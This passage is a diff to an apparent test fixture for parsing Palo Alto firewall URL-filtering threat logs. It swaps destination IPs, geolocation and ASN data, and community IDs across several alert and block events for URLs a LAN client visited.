"192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1380,7 +1370,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=", + "community_id": "1:AYXyX5+VIkDGOJnqe2YBg9tVR5g=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1417,14 +1407,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545376617Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079042Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1447,26 +1437,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1482,7 +1471,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1524,7 +1513,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=", + "community_id": "1:045bWPQTN726UkmixpDOZJC9Yi4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1561,14 +1550,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545383926Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079047800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1591,26 +1580,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1626,7 +1614,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1668,7 +1656,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=", + "community_id": "1:H2dYyEhLqvaoBzgcR4r/ZZbNhd0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1705,14 +1693,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545391563Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079053900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1735,26 +1723,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1770,7 +1757,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1812,7 +1799,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=", + "community_id": "1:Khx1n7BSHDnacX/jmUf9qzaA43E=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1849,14 +1836,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545398790Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079059800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1879,26 +1866,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1914,7 +1900,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -1955,7 +1941,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=", + "community_id": "1:jTZdxPnMPc+sLaxgXFcrsz+OuvQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -1991,14 +1977,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545405950Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079065600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2021,26 +2007,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2056,7 +2041,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2098,7 +2083,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=", + "community_id": "1:vCMdT6zPx0277mqoTE2FybOH35w=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2135,14 +2120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545417378Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079071400Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/suc.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2165,26 +2150,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2200,7 +2184,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2242,7 +2226,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=", + "community_id": "1:koetsWC4zZQTKrn1+nSjU/gkrDc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2279,14 +2263,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545426274Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079077300Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,\"cls-softwares.com/softwarefortubeview.40013.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2309,23 +2293,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Germany", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Germany", + "region_name": "Jilin", "location": { - "lon": 9.491, - "lat": 51.2993 - }, - "country_iso_code": "DE" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 28753, + "number": 4837, "organization": { - "name": "Leaseweb Deutschland GmbH" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "78.159.99.224" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2341,7 +2327,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "panw": { "panos": { "ruleset": "rule1", @@ -2382,7 +2368,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:v73LbTZDPLO+1dzNRixeZAmolJ0=", + "community_id": "1:oDY9jf8hdgOlTemZLRLtdPEwuRY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2418,14 +2404,14 @@ ], "ip": [ "192.168.0.2", - "78.159.99.224", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545433899Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", + "ingested": "2021-12-09T13:42:59.079083200Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,\"findmorepill.com/klik/search.php?q=xxx\",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0,", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2448,26 +2434,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2483,7 +2468,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2525,7 +2510,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=", + "community_id": "1:qI6GZCcTdUKaf6uoJvk4RiEYMoc=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2562,14 +2547,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545449282Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079089Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,\"allowedwebsurfing.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2592,26 +2577,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2627,7 +2611,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2669,7 +2653,7 @@ "preserve_original_event" ], "network": { - "community_id": 